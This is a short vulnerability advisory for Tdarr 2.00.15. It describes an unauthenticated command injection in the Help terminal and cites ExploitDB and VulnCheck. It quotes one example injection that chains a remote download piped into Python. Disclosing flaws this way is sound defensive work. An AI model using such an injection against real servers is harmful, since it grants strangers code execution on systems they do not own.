Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
Problem types
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Product status
Credits
Sam Smith
References
www.exploit-db.com/exploits/50822 (ExploitDB-50822)
tdarr.io (Official Vendor Homepage)
www.vulncheck.com/advisories/tdarr-command-injection (VulnCheck Advisory: Tdarr 2.00.15 - Command Injection)